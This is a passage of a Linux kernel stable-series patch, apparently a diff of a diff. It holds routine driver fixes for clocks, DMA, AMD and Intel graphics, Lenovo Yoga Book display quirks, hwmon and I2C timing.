++	struct regmap_config reg_config = sprdclk_regmap_config;
+ 
+ 	if (of_find_property(node, "sprd,syscon", NULL)) {
+ 		regmap = syscon_regmap_lookup_by_phandle(node, "sprd,syscon");
+@@ -59,12 +60,14 @@ int sprd_clk_regmap_init(struct platform_device *pdev,
+ 			return PTR_ERR(regmap);
+ 		}
+ 	} else {
+-		base = devm_platform_ioremap_resource(pdev, 0);
++		base = devm_platform_get_and_ioremap_resource(pdev, 0, &res);
+ 		if (IS_ERR(base))
+ 			return PTR_ERR(base);
+ 
++		reg_config.max_register = resource_size(res) - reg_config.reg_stride;
++
+ 		regmap = devm_regmap_init_mmio(&pdev->dev, base,
+-					       &sprdclk_regmap_config);
++					       &reg_config);
+ 		if (IS_ERR(regmap)) {
+ 			pr_err("failed to init regmap\n");
+ 			return PTR_ERR(regmap);
+diff --git a/drivers/dma/apple-admac.c b/drivers/dma/apple-admac.c
+index 90f28bda29c8b..4cf8da77bdd91 100644
+--- a/drivers/dma/apple-admac.c
++++ b/drivers/dma/apple-admac.c
+@@ -75,6 +75,7 @@
+ 
+ #define REG_TX_INTSTATE(idx)		(0x0030 + (idx) * 4)
+ #define REG_RX_INTSTATE(idx)		(0x0040 + (idx) * 4)
++#define REG_GLOBAL_INTSTATE(idx)	(0x0050 + (idx) * 4)
+ #define REG_CHAN_INTSTATUS(ch, idx)	(0x8010 + (ch) * 0x200 + (idx) * 4)
+ #define REG_CHAN_INTMASK(ch, idx)	(0x8020 + (ch) * 0x200 + (idx) * 4)
+ 
+@@ -511,7 +512,10 @@ static int admac_terminate_all(struct dma_chan *chan)
+ 	admac_stop_chan(adchan);
+ 	admac_reset_rings(adchan);
+ 
+-	adchan->current_tx = NULL;
++	if (adchan->current_tx) {
++		list_add_tail(&adchan->current_tx->node, &adchan->to_free);
++		adchan->current_tx = NULL;
++	}
+ 	/*
+ 	 * Descriptors can only be freed after the tasklet
+ 	 * has been killed (in admac_synchronize).
+@@ -672,13 +676,14 @@ static void admac_handle_chan_int(struct admac_data *ad, int no)
+ static irqreturn_t admac_interrupt(int irq, void *devid)
+ {
+ 	struct admac_data *ad = devid;
+-	u32 rx_intstate, tx_intstate;
++	u32 rx_intstate, tx_intstate, global_intstate;
+ 	int i;
+ 
+ 	rx_intstate = readl_relaxed(ad->base + REG_RX_INTSTATE(ad->irq_index));
+ 	tx_intstate = readl_relaxed(ad->base + REG_TX_INTSTATE(ad->irq_index));
++	global_intstate = readl_relaxed(ad->base + REG_GLOBAL_INTSTATE(ad->irq_index));
+ 
+-	if (!tx_intstate && !rx_intstate)
++	if (!tx_intstate && !rx_intstate && !global_intstate)
+ 		return IRQ_NONE;
+ 
+ 	for (i = 0; i < ad->nchannels; i += 2) {
+@@ -693,6 +698,12 @@ static irqreturn_t admac_interrupt(int irq, void *devid)
+ 		rx_intstate >>= 1;
+ 	}
+ 
++	if (global_intstate) {
++		dev_warn(ad->dev, "clearing unknown global interrupt flag: %x\n",
++			 global_intstate);
++		writel_relaxed(~(u32) 0, ad->base + REG_GLOBAL_INTSTATE(ad->irq_index));
++	}
++
+ 	return IRQ_HANDLED;
+ }
+ 
+@@ -850,6 +861,9 @@ static int admac_probe(struct platform_device *pdev)
+ 
+ 	dma->directions = BIT(DMA_MEM_TO_DEV) | BIT(DMA_DEV_TO_MEM);
+ 	dma->residue_granularity = DMA_RESIDUE_GRANULARITY_BURST;
++	dma->src_addr_widths = BIT(DMA_SLAVE_BUSWIDTH_1_BYTE) |
++			BIT(DMA_SLAVE_BUSWIDTH_2_BYTES) |
++			BIT(DMA_SLAVE_BUSWIDTH_4_BYTES);
+ 	dma->dst_addr_widths = BIT(DMA_SLAVE_BUSWIDTH_1_BYTE) |
+ 			BIT(DMA_SLAVE_BUSWIDTH_2_BYTES) |
+ 			BIT(DMA_SLAVE_BUSWIDTH_4_BYTES);
+diff --git a/drivers/firmware/efi/sysfb_efi.c b/drivers/firmware/efi/sysfb_efi.c
+index e76d6803bdd08..456d0e5eaf78b 100644
+--- a/drivers/firmware/efi/sysfb_efi.c
++++ b/drivers/firmware/efi/sysfb_efi.c
+@@ -272,6 +272,14 @@ static const struct dmi_system_id efifb_dmi_swap_width_height[] __initconst = {
+ 					"IdeaPad Duet 3 10IGL5"),
+ 		},
+ 	},
++	{
++		/* Lenovo Yoga Book X91F / X91L */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++			/* Non exact match to match F + L versions */
++			DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X91"),
++		},
++	},
+ 	{},
+ };
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+index 6fdb679321d0d..3cc1929285fc0 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+@@ -624,6 +624,15 @@ void amdgpu_fence_driver_clear_job_fences(struct amdgpu_ring *ring)
+ 		ptr = &ring->fence_drv.fences[i];
+ 		old = rcu_dereference_protected(*ptr, 1);
+ 		if (old && old->ops == &amdgpu_job_fence_ops) {
++			struct amdgpu_job *job;
++
++			/* For non-scheduler bad job, i.e. failed ib test, we need to signal
++			 * it right here or we won't be able to track them in fence_drv
++			 * and they will remain unsignaled during sa_bo free.
++			 */
++			job = container_of(old, struct amdgpu_job, hw_fence);
++			if (!job->base.s_fence && !dma_fence_is_signaled(old))
++				dma_fence_signal(old);
+ 			RCU_INIT_POINTER(*ptr, NULL);
+ 			dma_fence_put(old);
+ 		}
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index 90e739d9aeee7..0dd2fe4f071e8 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -1316,6 +1316,11 @@ static int gfx_v11_0_sw_init(void *handle)
+ 		break;
+ 	}
+ 
++	/* Enable CG flag in one VF mode for enabling RLC safe mode enter/exit */
++	if (adev->ip_versions[GC_HWIP][0] == IP_VERSION(11, 0, 3) &&
++		amdgpu_sriov_is_pp_one_vf(adev))
++		adev->cg_flags = AMD_CG_SUPPORT_GFX_CGCG;
++
+ 	/* EOP Event */
+ 	r = amdgpu_irq_add_id(adev, SOC21_IH_CLIENTID_GRBM_CP,
+ 			      GFX_11_0_0__SRCID__CP_EOP_INTERRUPT,
+@@ -4625,6 +4630,14 @@ static bool gfx_v11_0_check_soft_reset(void *handle)
+ 	return false;
+ }
+ 
++static int gfx_v11_0_post_soft_reset(void *handle)
++{
++	/**
++	 * GFX soft reset will impact MES, need resume MES when do GFX soft reset
++	 */
++	return amdgpu_mes_resume((struct amdgpu_device *)handle);
++}
++
+ static uint64_t gfx_v11_0_get_gpu_clock_counter(struct amdgpu_device *adev)
+ {
+ 	uint64_t clock;
+@@ -6068,6 +6081,7 @@ static const struct amd_ip_funcs gfx_v11_0_ip_funcs = {
+ 	.wait_for_idle = gfx_v11_0_wait_for_idle,
+ 	.soft_reset = gfx_v11_0_soft_reset,
+ 	.check_soft_reset = gfx_v11_0_check_soft_reset,
++	.post_soft_reset = gfx_v11_0_post_soft_reset,
+ 	.set_clockgating_state = gfx_v11_0_set_clockgating_state,
+ 	.set_powergating_state = gfx_v11_0_set_powergating_state,
+ 	.get_clockgating_state = gfx_v11_0_get_clockgating_state,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+index 6bd7e45370141..0329e548134b2 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+@@ -175,6 +175,40 @@ void dm_helpers_dp_update_branch_info(
+ 	const struct dc_link *link)
+ {}
+ 
++static void dm_helpers_construct_old_payload(
++			struct dc_link *link,
++			int pbn_per_slot,
++			struct drm_dp_mst_atomic_payload *new_payload,
++			struct drm_dp_mst_atomic_payload *old_payload)
++{
++	struct link_mst_stream_allocation_table current_link_table =
++									link->mst_stream_alloc_table;
++	struct link_mst_stream_allocation *dc_alloc;
++	int i;
++
++	*old_payload = *new_payload;
++
++	/* Set correct time_slots/PBN of old payload.
++	 * other fields (delete & dsc_enabled) in
++	 * struct drm_dp_mst_atomic_payload are don't care fields
++	 * while calling drm_dp_remove_payload()
++	 */
++	for (i = 0; i < current_link_table.stream_count; i++) {
++		dc_alloc =
++			&current_link_table.stream_allocations[i];
++
++		if (dc_alloc->vcp_id == new_payload->vcpi) {
++			old_payload->time_slots = dc_alloc->slot_count;
++			old_payload->pbn = dc_alloc->slot_count * pbn_per_slot;
++			break;
++		}
++	}
++
++	/* make sure there is an old payload*/
++	ASSERT(i != current_link_table.stream_count);
++
++}
++
+ /*
+  * Writes payload allocation table in immediate downstream device.
+  */
+@@ -186,7 +220,7 @@ bool dm_helpers_dp_mst_write_payload_allocation_table(
+ {
+ 	struct amdgpu_dm_connector *aconnector;
+ 	struct drm_dp_mst_topology_state *mst_state;
+-	struct drm_dp_mst_atomic_payload *payload;
++	struct drm_dp_mst_atomic_payload *target_payload, *new_payload, old_payload;
+ 	struct drm_dp_mst_topology_mgr *mst_mgr;
+ 
+ 	aconnector = (struct amdgpu_dm_connector *)stream->dm_stream_context;
+@@ -202,17 +236,26 @@ bool dm_helpers_dp_mst_write_payload_allocation_table(
+ 	mst_state = to_drm_dp_mst_topology_state(mst_mgr->base.state);
+ 
+ 	/* It's OK for this to fail */
+-	payload = drm_atomic_get_mst_payload_state(mst_state, aconnector->port);
+-	if (enable)
+-		drm_dp_add_payload_part1(mst_mgr, mst_state, payload);
+-	else
+-		drm_dp_remove_payload(mst_mgr, mst_state, payload, payload);
++	new_payload = drm_atomic_get_mst_payload_state(mst_state, aconnector->port);
++
++	if (enable) {
++		target_payload = new_payload;
++
++		drm_dp_add_payload_part1(mst_mgr, mst_state, new_payload);
++	} else {
++		/* construct old payload by VCPI*/
++		dm_helpers_construct_old_payload(stream->link, mst_state->pbn_div,
++						new_payload, &old_payload);
++		target_payload = &old_payload;
++
++		drm_dp_remove_payload(mst_mgr, mst_state, &old_payload, new_payload);
++	}
+ 
+ 	/* mst_mgr->->payloads are VC payload notify MST branch using DPCD or
+ 	 * AUX message. The sequence is slot 1-63 allocated sequence for each
+ 	 * stream. AMD ASIC stream slot allocation should follow the same
+ 	 * sequence. copy DRM MST allocation to dc */
+-	fill_dc_mst_payload_table_from_drm(stream->link, enable, payload, proposed_table);
++	fill_dc_mst_payload_table_from_drm(stream->link, enable, target_payload, proposed_table);
+ 
+ 	return true;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index 5dfeab7b999b8..ea4ec937f52e5 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -575,6 +575,14 @@ static int smu_v13_0_7_set_default_dpm_table(struct smu_context *smu)
+ 						     dpm_table);
+ 		if (ret)
+ 			return ret;
++
++		if (skutable->DriverReportedClocks.GameClockAc &&
++			(dpm_table->dpm_levels[dpm_table->count - 1].value >
++			skutable->DriverReportedClocks.GameClockAc)) {
++			dpm_table->dpm_levels[dpm_table->count - 1].value =
++				skutable->DriverReportedClocks.GameClockAc;
++			dpm_table->max = skutable->DriverReportedClocks.GameClockAc;
++		}
+ 	} else {
+ 		dpm_table->count = 1;
+ 		dpm_table->dpm_levels[0].value = smu->smu_table.boot_values.gfxclk / 100;
+@@ -828,6 +836,57 @@ static int smu_v13_0_7_get_smu_metrics_data(struct smu_context *smu,
+ 	return ret;
+ }
+ 
++static int smu_v13_0_7_get_dpm_ultimate_freq(struct smu_context *smu,
++					     enum smu_clk_type clk_type,
++					     uint32_t *min,
++					     uint32_t *max)
++{
++	struct smu_13_0_dpm_context *dpm_context =
++		smu->smu_dpm.dpm_context;
++	struct smu_13_0_dpm_table *dpm_table;
++
++	switch (clk_type) {
++	case SMU_MCLK:
++	case SMU_UCLK:
++		/* uclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.uclk_table;
++		break;
++	case SMU_GFXCLK:
++	case SMU_SCLK:
++		/* gfxclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.gfx_table;
++		break;
++	case SMU_SOCCLK:
++		/* socclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.soc_table;
++		break;
++	case SMU_FCLK:
++		/* fclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.fclk_table;
++		break;
++	case SMU_VCLK:
++	case SMU_VCLK1:
++		/* vclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.vclk_table;
++		break;
++	case SMU_DCLK:
++	case SMU_DCLK1:
++		/* dclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.dclk_table;
++		break;
++	default:
++		dev_err(smu->adev->dev, "Unsupported clock type!\n");
++		return -EINVAL;
++	}
++
++	if (min)
++		*min = dpm_table->min;
++	if (max)
++		*max = dpm_table->max;
++
++	return 0;
++}
++
+ static int smu_v13_0_7_read_sensor(struct smu_context *smu,
+ 				   enum amd_pp_sensors sensor,
+ 				   void *data,
+@@ -1328,9 +1387,17 @@ static int smu_v13_0_7_populate_umd_state_clk(struct smu_context *smu)
+ 				&dpm_context->dpm_tables.fclk_table;
+ 	struct smu_umd_pstate_table *pstate_table =
+ 				&smu->pstate_table;
++	struct smu_table_context *table_context = &smu->smu_table;
++	PPTable_t *pptable = table_context->driver_pptable;
++	DriverReportedClocks_t driver_clocks =
++		pptable->SkuTable.DriverReportedClocks;
+ 
+ 	pstate_table->gfxclk_pstate.min = gfx_table->min;
+-	pstate_table->gfxclk_pstate.peak = gfx_table->max;
++	if (driver_clocks.GameClockAc &&
++		(driver_clocks.GameClockAc < gfx_table->max))
++		pstate_table->gfxclk_pstate.peak = driver_clocks.GameClockAc;
++	else
++		pstate_table->gfxclk_pstate.peak = gfx_table->max;
+ 
+ 	pstate_table->uclk_pstate.min = mem_table->min;
+ 	pstate_table->uclk_pstate.peak = mem_table->max;
+@@ -1347,12 +1414,12 @@ static int smu_v13_0_7_populate_umd_state_clk(struct smu_context *smu)
+ 	pstate_table->fclk_pstate.min = fclk_table->min;
+ 	pstate_table->fclk_pstate.peak = fclk_table->max;
+ 
+-	/*
+-	 * For now, just use the mininum clock frequency.
+-	 * TODO: update them when the real pstate settings available
+-	 */
+-	pstate_table->gfxclk_pstate.standard = gfx_table->min;
+-	pstate_table->uclk_pstate.standard = mem_table->min;
++	if (driver_clocks.BaseClockAc &&
++		driver_clocks.BaseClockAc < gfx_table->max)
++		pstate_table->gfxclk_pstate.standard = driver_clocks.BaseClockAc;
++	else
++		pstate_table->gfxclk_pstate.standard = gfx_table->max;
++	pstate_table->uclk_pstate.standard = mem_table->max;
+ 	pstate_table->socclk_pstate.standard = soc_table->min;
+ 	pstate_table->vclk_pstate.standard = vclk_table->min;
+ 	pstate_table->dclk_pstate.standard = dclk_table->min;
+@@ -1675,7 +1742,7 @@ static const struct pptable_funcs smu_v13_0_7_ppt_funcs = {
+ 	.dpm_set_jpeg_enable = smu_v13_0_set_jpeg_enable,
+ 	.init_pptable_microcode = smu_v13_0_init_pptable_microcode,
+ 	.populate_umd_state_clk = smu_v13_0_7_populate_umd_state_clk,
+-	.get_dpm_ultimate_freq = smu_v13_0_get_dpm_ultimate_freq,
++	.get_dpm_ultimate_freq = smu_v13_0_7_get_dpm_ultimate_freq,
+ 	.get_vbios_bootup_values = smu_v13_0_get_vbios_bootup_values,
+ 	.read_sensor = smu_v13_0_7_read_sensor,
+ 	.feature_is_enabled = smu_cmn_feature_is_enabled,
+diff --git a/drivers/gpu/drm/armada/armada_drv.c b/drivers/gpu/drm/armada/armada_drv.c
+index 0643887800b4d..142668cd6d7cd 100644
+--- a/drivers/gpu/drm/armada/armada_drv.c
++++ b/drivers/gpu/drm/armada/armada_drv.c
+@@ -99,7 +99,6 @@ static int armada_drm_bind(struct device *dev)
+ 	if (ret) {
+ 		dev_err(dev, "[" DRM_NAME ":%s] can't kick out simple-fb: %d\n",
+ 			__func__, ret);
+-		kfree(priv);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 5522d610c5cfd..b1a38e6ce2f8f 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -328,10 +328,17 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "IdeaPad Duet 3 10IGL5"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
+-	}, {	/* Lenovo Yoga Book X90F / X91F / X91L */
++	}, {	/* Lenovo Yoga Book X90F / X90L */
+ 		.matches = {
+-		  /* Non exact match to match all versions */
+-		  DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X9"),
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "YETI-11"),
++		},
++		.driver_data = (void *)&lcd1200x1920_rightside_up,
++	}, {	/* Lenovo Yoga Book X91F / X91L */
++		.matches = {
++		  /* Non exact match to match F + L versions */
++		  DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X91"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
+ 	}, {	/* Lenovo Yoga Tablet 2 830F / 830L */
+diff --git a/drivers/gpu/drm/i915/display/icl_dsi.c b/drivers/gpu/drm/i915/display/icl_dsi.c
+index ecd6c5c3f4ded..dd64b93c78e55 100644
+--- a/drivers/gpu/drm/i915/display/icl_dsi.c
++++ b/drivers/gpu/drm/i915/display/icl_dsi.c
+@@ -299,9 +299,21 @@ static void configure_dual_link_mode(struct intel_encoder *encoder,
+ {
+ 	struct drm_i915_private *dev_priv = to_i915(encoder->base.dev);
+ 	struct intel_dsi *intel_dsi = enc_to_intel_dsi(encoder);
++	i915_reg_t dss_ctl1_reg, dss_ctl2_reg;
+ 	u32 dss_ctl1;
+ 
+-	dss_ctl1 = intel_de_read(dev_priv, DSS_CTL1);
++	/* FIXME: Move all DSS handling to intel_vdsc.c */
++	if (DISPLAY_VER(dev_priv) >= 12) {
++		struct intel_crtc *crtc = to_intel_crtc(pipe_config->uapi.crtc);
++
++		dss_ctl1_reg = ICL_PIPE_DSS_CTL1(crtc->pipe);
++		dss_ctl2_reg = ICL_PIPE_DSS_CTL2(crtc->pipe);
++	} else {
++		dss_ctl1_reg = DSS_CTL1;
++		dss_ctl2_reg = DSS_CTL2;
++	}
++
++	dss_ctl1 = intel_de_read(dev_priv, dss_ctl1_reg);
+ 	dss_ctl1 |= SPLITTER_ENABLE;
+ 	dss_ctl1 &= ~OVERLAP_PIXELS_MASK;
+ 	dss_ctl1 |= OVERLAP_PIXELS(intel_dsi->pixel_overlap);
+@@ -322,16 +334,16 @@ static void configure_dual_link_mode(struct intel_encoder *encoder,
+ 
+ 		dss_ctl1 &= ~LEFT_DL_BUF_TARGET_DEPTH_MASK;
+ 		dss_ctl1 |= LEFT_DL_BUF_TARGET_DEPTH(dl_buffer_depth);
+-		dss_ctl2 = intel_de_read(dev_priv, DSS_CTL2);
++		dss_ctl2 = intel_de_read(dev_priv, dss_ctl2_reg);
+ 		dss_ctl2 &= ~RIGHT_DL_BUF_TARGET_DEPTH_MASK;
+ 		dss_ctl2 |= RIGHT_DL_BUF_TARGET_DEPTH(dl_buffer_depth);
+-		intel_de_write(dev_priv, DSS_CTL2, dss_ctl2);
++		intel_de_write(dev_priv, dss_ctl2_reg, dss_ctl2);
+ 	} else {
+ 		/* Interleave */
+ 		dss_ctl1 |= DUAL_LINK_MODE_INTERLEAVE;
+ 	}
+ 
+-	intel_de_write(dev_priv, DSS_CTL1, dss_ctl1);
++	intel_de_write(dev_priv, dss_ctl1_reg, dss_ctl1);
+ }
+ 
+ /* aka DSI 8X clock */
+diff --git a/drivers/hid/intel-ish-hid/ishtp/bus.c b/drivers/hid/intel-ish-hid/ishtp/bus.c
+index f68aba8794fe5..d4296681cf720 100644
+--- a/drivers/hid/intel-ish-hid/ishtp/bus.c
++++ b/drivers/hid/intel-ish-hid/ishtp/bus.c
+@@ -241,8 +241,8 @@ static int ishtp_cl_bus_match(struct device *dev, struct device_driver *drv)
+ 	struct ishtp_cl_device *device = to_ishtp_cl_device(dev);
+ 	struct ishtp_cl_driver *driver = to_ishtp_cl_driver(drv);
+ 
+-	return guid_equal(&driver->id[0].guid,
+-			  &device->fw_client->props.protocol_name);
++	return(device->fw_client ? guid_equal(&driver->id[0].guid,
++	       &device->fw_client->props.protocol_name) : 0);
+ }
+ 
+ /**
+diff --git a/drivers/hwmon/peci/cputemp.c b/drivers/hwmon/peci/cputemp.c
+index 30850a479f61f..87d56f0fc888c 100644
+--- a/drivers/hwmon/peci/cputemp.c
++++ b/drivers/hwmon/peci/cputemp.c
+@@ -537,6 +537,12 @@ static const struct cpu_info cpu_hsx = {
+ 	.thermal_margin_to_millidegree = &dts_eight_dot_eight_to_millidegree,
+ };
+ 
++static const struct cpu_info cpu_skx = {
++	.reg		= &resolved_cores_reg_hsx,
++	.min_peci_revision = 0x33,
++	.thermal_margin_to_millidegree = &dts_ten_dot_six_to_millidegree,
++};
++
+ static const struct cpu_info cpu_icx = {
+ 	.reg		= &resolved_cores_reg_icx,
+ 	.min_peci_revision = 0x40,
+@@ -558,7 +564,7 @@ static const struct auxiliary_device_id peci_cputemp_ids[] = {
+ 	},
+ 	{
+ 		.name = "peci_cpu.cputemp.skx",
+-		.driver_data = (kernel_ulong_t)&cpu_hsx,
++		.driver_data = (kernel_ulong_t)&cpu_skx,
+ 	},
+ 	{
+ 		.name = "peci_cpu.cputemp.icx",
+diff --git a/drivers/hwmon/xgene-hwmon.c b/drivers/hwmon/xgene-hwmon.c
+index d1abea49f01be..78d9f52e2a719 100644
+--- a/drivers/hwmon/xgene-hwmon.c
++++ b/drivers/hwmon/xgene-hwmon.c
+@@ -698,14 +698,14 @@ static int xgene_hwmon_probe(struct platform_device *pdev)
+ 		ctx->comm_base_addr = pcc_chan->shmem_base_addr;
+ 		if (ctx->comm_base_addr) {
+ 			if (version == XGENE_HWMON_V2)
+-				ctx->pcc_comm_addr = (void __force *)ioremap(
+-							ctx->comm_base_addr,
+-							pcc_chan->shmem_size);
++				ctx->pcc_comm_addr = (void __force *)devm_ioremap(&pdev->dev,
++								  ctx->comm_base_addr,
++								  pcc_chan->shmem_size);
+ 			else
+-				ctx->pcc_comm_addr = memremap(
+-							ctx->comm_base_addr,
+-							pcc_chan->shmem_size,
+-							MEMREMAP_WB);
++				ctx->pcc_comm_addr = devm_memremap(&pdev->dev,
++								   ctx->comm_base_addr,
++								   pcc_chan->shmem_size,
++								   MEMREMAP_WB);
+ 		} else {
+ 			dev_err(&pdev->dev, "Failed to get PCC comm region\n");
+ 			rc = -ENODEV;
+diff --git a/drivers/i2c/busses/i2c-hisi.c b/drivers/i2c/busses/i2c-hisi.c
+index d30071f299879..8a61bee745a16 100644
+--- a/drivers/i2c/busses/i2c-hisi.c
++++ b/drivers/i2c/busses/i2c-hisi.c
+@@ -314,6 +314,13 @@ static void hisi_i2c_xfer_msg(struct hisi_i2c_controller *ctlr)
+ 		    max_write == 0)
+ 			break;
+ 	}
++
++	/*
++	 * Disable the TX_EMPTY interrupt after finishing all the messages to
++	 * avoid overwhelming the CPU.
++	 */
++	if (ctlr->msg_tx_idx == ctlr->msg_num)
++		hisi_i2c_disable_int(ctlr, HISI_I2C_INT_TX_EMPTY);
+ }
+ 
+ static irqreturn_t hisi_i2c_irq(int irq, void *context)
+diff --git a/drivers/i2c/busses/i2c-imx-lpi2c.c b/drivers/i2c/busses/i2c-imx-lpi2c.c
+index 9b2f9544c5681..a49b14d52a986 100644
+--- a/drivers/i2c/busses/i2c-imx-lpi2c.c
++++ b/drivers/i2c/busses/i2c-imx-lpi2c.c
+@@ -463,6 +463,8 @@ static int lpi2c_imx_xfer(struct i2c_adapter *adapter,
+ 		if (num == 1 && msgs[0].len == 0)
+ 			goto stop;
+ 
++		lpi2c_imx->rx_buf = NULL;
++		lpi2c_imx->tx_buf = NULL;
+ 		lpi2c_imx->delivered = 0;
+ 		lpi2c_imx->msglen = msgs[i].len;
+ 		init_completion(&lpi2c_imx->complete);
+diff --git a/drivers/i2c/busses/i2c-mchp-pci1xxxx.c b/drivers/i2c/busses/i2c-mchp-pci1xxxx.c
+index 09af759211478..b21ffd6df9276 100644
+--- a/drivers/i2c/busses/i2c-mchp-pci1xxxx.c
++++ b/drivers/i2c/busses/i2c-mchp-pci1xxxx.c
+@@ -48,9 +48,9 @@
+  * SR_HOLD_TIME_XK_TICKS field will indicate the number of ticks of the
+  * baud clock required to program 'Hold Time' at X KHz.
+  */
+-#define SR_HOLD_TIME_100K_TICKS	133
+-#define SR_HOLD_TIME_400K_TICKS	20
+-#define SR_HOLD_TIME_1000K_TICKS	11
++#define SR_HOLD_TIME_100K_TICKS		150
++#define SR_HOLD_TIME_400K_TICKS		20
++#define SR_HOLD_TIME_1000K_TICKS	12
+ 
+ #define SMB_CORE_COMPLETION_REG_OFF3	(SMBUS_MAST_CORE_ADDR_BASE + 0x23)
+ 
+@@ -65,17 +65,17 @@
+  * the baud clock required to program 'fair idle delay' at X KHz. Fair idle
+  * delay establishes the MCTP T(IDLE_DELAY) period.
+  */
+-#define FAIR_BUS_IDLE_MIN_100K_TICKS		969
+-#define FAIR_BUS_IDLE_MIN_400K_TICKS		157
+-#define FAIR_BUS_IDLE_MIN_1000K_TICKS		157
++#define FAIR_BUS_IDLE_MIN_100K_TICKS		992
++#define FAIR_BUS_IDLE_MIN_400K_TICKS		500
++#define FAIR_BUS_IDLE_MIN_1000K_TICKS		500
+ 
+ /*
+  * FAIR_IDLE_DELAY_XK_TICKS field will indicate the number of ticks of the
+  * baud clock required to satisfy the fairness protocol at X KHz.
+  */
+-#define FAIR_IDLE_DELAY_100K_TICKS	1000
+-#define FAIR_IDLE_DELAY_400K_TICKS	500
+-#define FAIR_IDLE_DELAY_1000K_TICKS	500
++#define FAIR_IDLE_DELAY_100K_TICKS	963
++#define FAIR_IDLE_DELAY_400K_TICKS	156
++#define FAIR_IDLE_DELAY_1000K_TICKS	156
+ 
+ #define SMB_IDLE_SCALING_100K		\
+ 	((FAIR_IDLE_DELAY_100K_TICKS << 16) | FAIR_BUS_IDLE_MIN_100K_TICKS)
+@@ -105,7 +105,7 @@
+  */
+ #define BUS_CLK_100K_LOW_PERIOD_TICKS		156
+ #define BUS_CLK_400K_LOW_PERIOD_TICKS		41
+-#define BUS_CLK_1000K_LOW_PERIOD_TICKS	15
++#define BUS_CLK_1000K_LOW_PERIOD_TICKS		15
+ 
+ /*
+  * BUS_CLK_XK_HIGH_PERIOD_TICKS field defines the number of I2C Baud Clock
+@@ -131,7 +131,7 @@
+  */
+ #define CLK_SYNC_100K			4
+ #define CLK_SYNC_400K			4
+-#define CLK_SYNC_1000K		4
++#define CLK_SYNC_1000K			4
+ 
+ #define SMB_CORE_DATA_TIMING_REG_OFF	(SMBUS_MAST_CORE_ADDR_BASE + 0x40)
+ 
+@@ -142,25 +142,25 @@
+  * determines the SCLK hold time following SDAT driven low during the first
+  * START bit in a transfer.
+  */
+-#define FIRST_START_HOLD_100K_TICKS	22
+-#define FIRST_START_HOLD_400K_TICKS	16
+-#define FIRST_START_HOLD_1000K_TICKS	6
++#define FIRST_START_HOLD_100K_TICKS	23
++#define FIRST_START_HOLD_400K_TICKS	8
++#define FIRST_START_HOLD_1000K_TICKS	12
+ 
+ /*
+  * STOP_SETUP_XK_TICKS will indicate the number of ticks of the baud clock
+  * required to program 'STOP_SETUP' timer at X KHz. This timer determines the
+  * SDAT setup time from the rising edge of SCLK for a STOP condition.
+  */
+-#define STOP_SETUP_100K_TICKS		157
++#define STOP_SETUP_100K_TICKS		150
+ #define STOP_SETUP_400K_TICKS		20
+-#define STOP_SETUP_1000K_TICKS	12
++#define STOP_SETUP_1000K_TICKS		12
+ 
+ /*
+  * RESTART_SETUP_XK_TICKS will indicate the number of ticks of the baud clock
+  * required to program 'RESTART_SETUP' timer at X KHz. This timer determines the
+  * SDAT setup time from the rising edge of SCLK for a repeated START condition.
+  */
+-#define RESTART_SETUP_100K_TICKS	157
++#define RESTART_SETUP_100K_TICKS	156
+ #define RESTART_SETUP_400K_TICKS	20
+ #define RESTART_SETUP_1000K_TICKS	12
+ 
+@@ -169,7 +169,7 @@
+  * required to program 'DATA_HOLD' timer at X KHz. This timer determines the
+  * SDAT hold time following SCLK driven low.
+  */
+-#define DATA_HOLD_100K_TICKS		2
++#define DATA_HOLD_100K_TICKS		12
+ #define DATA_HOLD_400K_TICKS		2
+ #define DATA_HOLD_1000K_TICKS		2
+ 
+@@ -190,35 +190,35 @@
+  * Bus Idle Minimum time = BUS_IDLE_MIN[7:0] x Baud_Clock_Period x
+  * (BUS_IDLE_MIN_XK_TICKS[7] ? 4,1)
+  */
+-#define BUS_IDLE_MIN_100K_TICKS		167UL
